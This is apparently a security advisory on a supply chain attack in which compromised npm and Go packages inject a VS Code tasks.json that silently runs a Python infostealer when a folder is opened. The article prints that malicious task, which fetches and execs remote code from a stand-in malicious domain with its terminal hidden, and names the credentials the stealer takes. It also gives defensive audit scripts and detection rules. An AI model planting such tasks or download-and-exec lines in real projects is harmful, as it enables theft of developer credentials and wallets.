Threat actors have compromised legitimate npm and Go packages to deliver a sophisticated Python-based infostealer that exploits Visual Studio Code’s task automation system. The malware hijacks VS Code’s tasks.json configuration to execute malicious payloads silently when developers open infected projects. This supply chain attack targets developer credentials, cryptocurrency wallets, browser data, and source code, with the malicious code persisting through VS Code’s trusted workspace feature.
Introduction
The software development supply chain has become a prime target for sophisticated threat actors seeking to compromise thousands of systems through a single poisoned package. In a recent campaign, attackers successfully hijacked multiple npm and Go packages, embedding malicious code that weaponizes Visual Studio Code’s built-in task automation features to deploy a Python-based information stealer.
This attack represents an evolution in supply chain compromise techniques, moving beyond simple post-install scripts to leverage IDE-specific features that developers trust implicitly. By abusing VS Code’s tasks.json configuration files, the malware achieves execution in a context that typically bypasses security scrutiny, making detection significantly more challenging.
The affected packages have been downloaded thousands of times before detection, potentially compromising developer workstations across numerous organizations. This incident underscores the critical need for enhanced supply chain security measures and vigilance when incorporating third-party dependencies into development workflows.
Background & Context
Visual Studio Code’s task system allows developers to automate repetitive operations like building, testing, and deploying code. Tasks are defined in .vscode/tasks.json files within project directories and can be configured to run automatically when a workspace is opened. While this feature enhances productivity, it also creates an attack vector when malicious actors control the task configuration.
Supply chain attacks targeting developer tools have surged over the past two years, with npm and Go ecosystems experiencing numerous compromise incidents. Attackers typically employ typosquatting, dependency confusion, or account takeover to inject malicious code into packages that developers trust and integrate into their projects.
The combination of package manager compromise and IDE exploitation represents a sophisticated multi-stage attack that requires understanding of both software distribution mechanisms and developer workflows. This campaign demonstrates that threat actors are increasingly studying the specific tools and practices used by development teams to craft attacks that blend seamlessly into normal operations.
The Python infostealer payload itself follows established patterns seen in commodity malware, but its delivery mechanism through VS Code tasks marks a novel approach that significantly reduces the likelihood of detection during the initial infection phase.
Technical Breakdown
The attack chain begins when a developer installs a compromised npm or Go package containing hidden malicious code. During installation, the package creates or modifies the .vscode/tasks.json file in the project root directory with a malicious task configuration.
The injected task is structured to execute automatically using the “runOn” property set to “folderOpen”:
```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Install Dependencies",
      "type": "shell",
      "command": "python3",
      "args": ["-c", "import urllib.request; exec(urllib.request.urlopen('https://malicious-domain.com/payload.txt').read())"],
      "runOptions": {
        "runOn": "folderOpen"
      },
      "presentation": {
        "reveal": "never",
        "panel": "shared"
      }
    }
  ]
}
```
The task configuration includes several evasion techniques:
Silent Execution: The “reveal: never” presentation option prevents VS Code from displaying a terminal window, allowing the malicious code to run invisibly in the background.
Obfuscated Command: The Python one-liner downloads and executes a secondary payload directly in memory without writing files to disk, complicating forensic analysis.
Legitimate Appearance: The task label “Install Dependencies” mimics common development operations, reducing suspicion if a developer reviews the configuration.
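The three traits listed above can be checked mechanically. The following Python code is an added example, not code from the campaign or from VS Code; the keyword heuristics and the sample file are assumptions constructed for illustration. It reads tasks.json as JSON with comments and trailing commas, and also inspects per-OS command overrides.

```python
import json
import re

_STR = r'"(?:\\.|[^"\\])*"'  # one JSON string literal
# Assumed heuristics (not exhaustive): interpreter/fetch tools, inline download-and-run.
INTERPRETER = re.compile(r"\b(python3?|node|bash|sh|pwsh|powershell|curl|wget)\b", re.I)
INLINE_FETCH = re.compile(r"https?://|urlopen|\bexec\(|\beval\(|base64", re.I)

def _drop(pattern, text):
    """Delete matches of pattern while leaving JSON string literals untouched."""
    rx = re.compile(_STR + "|" + pattern, re.S)
    return rx.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)

def load_jsonc(text):
    """tasks.json may contain comments and trailing commas; json.loads rejects both."""
    text = _drop(r"//[^\n]*|/\*.*?\*/", text)
    return json.loads(_drop(r",(?=\s*[}\]])", text))

def _cmdlines(task):
    """Base command line plus the windows/linux/osx overrides a task may carry."""
    scopes = [task] + [task[k] for k in ("windows", "linux", "osx") if isinstance(task.get(k), dict)]
    for scope in scopes:
        parts = [scope.get("command", "")] + list(scope.get("args", []))
        yield " ".join(str(p.get("value", "") if isinstance(p, dict) else p) for p in parts)

def audit_tasks(text):
    """Return [(label, reasons)] for every task that auto-runs on folder open."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        reasons = ["runOn=folderOpen"]
        if task.get("presentation", {}).get("reveal") == "never":
            reasons.append("reveal=never")
        if any(INTERPRETER.search(c) and INLINE_FETCH.search(c) for c in _cmdlines(task)):
            reasons.append("inline fetch/exec")
        findings.append((task.get("label", "<unlabelled>"), reasons))
    return findings

# Constructed sample: the article's injected task beside an ordinary build task.
SAMPLE = r"""{
  "tasks": [  // comments and trailing commas are legal in tasks.json
    {"label": "build", "type": "shell", "command": "make", "args": ["all"],},
    {"label": "Install Dependencies", "type": "shell", "command": "python3",
     "args": ["-c", "import urllib.request; exec(urllib.request.urlopen('https://example.invalid/p').read())"],
     "runOptions": {"runOn": "folderOpen"}, "presentation": {"reveal": "never"}},
  ]
}"""
print(audit_tasks(SAMPLE))
```

A task flagged only with runOn=folderOpen still deserves a manual look, since the keyword lists are a starting point rather than a complete signature.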
The downloaded Python payload is a comprehensive infostealer targeting:
- Browser credentials and cookies (Chrome, Firefox, Edge, Brave)
- Cryptocurrency wallet files and browser extensions
- SSH private keys from .ssh directories
- Git credentials and configuration files
- AWS, Azure, and GCP cloud provider credentials
- Environment variables containing API keys and tokens
- VS Code settings and extension data
- Clipboard contents and screenshots
The stealer exfiltrates data using multiple methods including HTTP POST requests to command-and-control infrastructure, Telegram bot APIs, and Discord webhooks, providing redundancy if one communication channel is blocked.
Persistence Mechanism: Beyond the initial execution, the malware modifies VS Code’s user settings (settings.json) to add the compromised workspace to the trusted workspaces list, ensuring tasks continue executing on subsequent opens without prompting the user for confirmation.
Impact & Risk Assessment
The impact of this attack extends far beyond individual developer workstations. Compromised credentials and API keys can provide attackers with:
Lateral Movement: Stolen SSH keys and cloud credentials enable attackers to access production environments, databases, and internal infrastructure that developers have permissions to access.
Source Code Theft: Git credentials and repository access allow exfiltration of proprietary code, intellectual property, and embedded secrets within codebases.
Financial Loss: Cryptocurrency wallet compromise results in immediate monetary theft, while stolen payment information can be sold or exploited.
Supply Chain Propagation: With access to developer accounts on package registries and repositories, attackers can inject malicious code into additional packages, exponentially expanding the compromise.
Reputation Damage: Organizations whose developers are compromised may face customer trust issues, regulatory penalties, and competitive disadvantages if breaches become public.
The risk is particularly acute because developers typically operate with elevated privileges and have access to sensitive systems that are isolated from general employee access. A single compromised developer workstation can serve as a beachhead for extensive network infiltration.
Organizations using the affected packages face immediate risk, but the broader developer community must also recognize that this technique can be replicated across any IDE with similar automation features, including JetBrains products, Eclipse, and others.
Vendor Response
Microsoft, as the maintainer of Visual Studio Code, has been notified of this attack technique. While VS Code’s task automation features are functioning as designed, Microsoft has indicated they are exploring enhanced security controls for workspace trust and task execution.
Current VS Code versions do prompt users when opening untrusted workspaces for the first time, but the malware specifically targets the trust establishment process by manipulating settings after initial compromise.
The npm security team has removed the identified malicious packages from the registry and suspended associated accounts. Package names have been flagged to prevent future registration by other actors. The Go team has taken similar action within the Go module proxy system.
Both npm and Go maintainers have emphasized that package verification remains primarily the responsibility of consumers, though they continue to invest in automated malware detection systems and security scanning infrastructure.
GitHub, which hosts the majority of affected repositories, has issued security advisories for projects that included the compromised packages as dependencies. Dependabot alerts have been triggered for repositories using vulnerable versions.
Mitigations & Workarounds
Organizations and individual developers should implement the following mitigations immediately:
Audit Project Configurations: Examine all .vscode/tasks.json files in current projects for suspicious or unfamiliar task definitions:
```bash
find ~/projects -name "tasks.json" -exec grep -l "runOn.*folderOpen" {} \;
```
Disable Automatic Task Execution: Modify VS Code settings to prevent automatic task execution on folder open:
```json
{
  "task.allowAutomaticTasks": "off"
}
```
Review Package Dependencies: Audit package.json and go.mod files for unexpected dependencies or recently updated packages from unfamiliar publishers:
```bash
npm audit
go list -m -json all | jq -r '.Path'
```
Implement Package Integrity Verification: Use lock files (package-lock.json, go.sum) and verify checksums before installation to detect tampering.
Restrict Workspace Trust: Be conservative with workspace trust settings and regularly review trusted workspace lists in VS Code settings.
Network Egress Filtering: Implement firewall rules blocking outbound connections from development tools to unknown domains.
Detection & Monitoring
Security teams should implement the following detection strategies:
File Integrity Monitoring: Monitor for creation or modification of .vscode/tasks.json files, particularly by package manager processes:
```bash
auditctl -w /.vscode/tasks.json -p wa -k vscode_tasks
```
Process Monitoring: Alert on Python or shell processes spawned by VS Code with network connectivity:
```yaml
- rule: Suspicious VS Code Child Process
  condition: proc.pname = "code" and proc.name in (python, python3, bash, sh, curl, wget) and fd.net
```
Network Traffic Analysis: Monitor for unusual outbound connections from developer workstations to cloud storage services, paste sites, or Telegram/Discord APIs.
EDR Behavioral Detection: Configure endpoint detection platforms to flag memory-only execution patterns and credential access attempts by development tools.
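The process-monitoring rule above matches only a direct parent named code, so an interpreter started through an intermediate shell has that shell as its parent and is missed. This added example (not part of the original article; the event records and their field names are constructed) walks the full process ancestry instead.

```python
# Constructed process-start and connect events; addresses are documentation ranges.
EVENTS = [
    {"type": "exec", "pid": 100, "ppid": 1, "name": "code"},
    {"type": "exec", "pid": 210, "ppid": 100, "name": "bash"},
    {"type": "exec", "pid": 211, "ppid": 210, "name": "python3"},
    {"type": "connect", "pid": 211, "dst": "203.0.113.7:443"},
    {"type": "exec", "pid": 300, "ppid": 1, "name": "bash"},
    {"type": "exec", "pid": 301, "ppid": 300, "name": "curl"},
    {"type": "connect", "pid": 301, "dst": "198.51.100.9:443"},
    {"type": "exec", "pid": 220, "ppid": 100, "name": "git"},
    {"type": "connect", "pid": 220, "dst": "192.0.2.10:443"},
]

WATCHED = {"python", "python3", "bash", "sh", "curl", "wget"}  # names from the rule above


def ancestors(pid, procs, limit=32):
    """Yield parent, grandparent, ... names; limit guards against pid reuse loops."""
    for _ in range(limit):
        parent = procs.get(pid, {}).get("ppid")
        if parent not in procs:
            return
        yield procs[parent]["name"]
        pid = parent


def detect(events, editor="code"):
    """Alert on watched processes that connect out and descend from the editor."""
    procs, alerts = {}, []
    for ev in events:
        if ev["type"] == "exec":
            procs[ev["pid"]] = ev
        elif ev["type"] == "connect" and ev["pid"] in procs:
            proc = procs[ev["pid"]]
            chain = list(ancestors(ev["pid"], procs))
            if proc["name"] in WATCHED and editor in chain:
                alerts.append({"pid": proc["pid"], "name": proc["name"],
                               "dst": ev["dst"], "direct_parent": chain[0] == editor})
    return alerts


print(detect(EVENTS))
```

The direct_parent field shows which alerts a parent-only condition would also have caught; in the sample it is False for the python3 process.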
Log Analysis: Examine VS Code extension logs and task execution logs for unexpected activity:
```bash
tail -f ~/.config/Code/logs//exthost/output | grep -i "running task"
```
Best Practices
Development teams should adopt these security practices to reduce supply chain risk:
Dependency Vetting: Before adding dependencies, review package maintainer reputation, update frequency, download statistics, and GitHub repository activity. Be particularly cautious of packages with recent ownership changes.
Minimal Dependencies: Reduce attack surface by minimizing third-party dependencies and regularly auditing whether each package is still necessary.
Sandboxed Development: Use containerized or virtual machine environments for projects involving unfamiliar code, isolating potential compromises from the host system.
Credential Management: Store sensitive credentials in dedicated secret management solutions (HashiCorp Vault, AWS Secrets Manager) rather than configuration files or environment variables.
Multi-Factor Authentication: Enforce MFA on all developer accounts for package registries, cloud providers, and source control platforms to limit damage from credential theft.
Regular Security Training: Educate developers about supply chain risks and social engineering techniques used to compromise package ecosystems.
Automated Security Scanning: Integrate tools like Snyk, Socket, or Dependabot into CI/CD pipelines to identify malicious packages before they reach production environments.
Least Privilege: Limit developer access to production systems and sensitive data, implementing just-in-time access provisioning where possible.
Key Takeaways
- Threat actors are evolving supply chain attacks to exploit IDE-specific features like VS Code tasks, moving beyond traditional package manager hooks
- Automatic task execution on folder open provides a stealthy persistence mechanism that bypasses many security controls
- Python-based infostealers deployed through this technique can harvest credentials, cryptocurrency, and source code from developer workstations
- Organizations must audit project configurations, disable automatic task execution, and implement comprehensive dependency vetting processes
- Detection requires multi-layered monitoring including file integrity, process behavior, and network traffic analysis
- The incident demonstrates that developer tools themselves have become high-value targets requiring dedicated security controls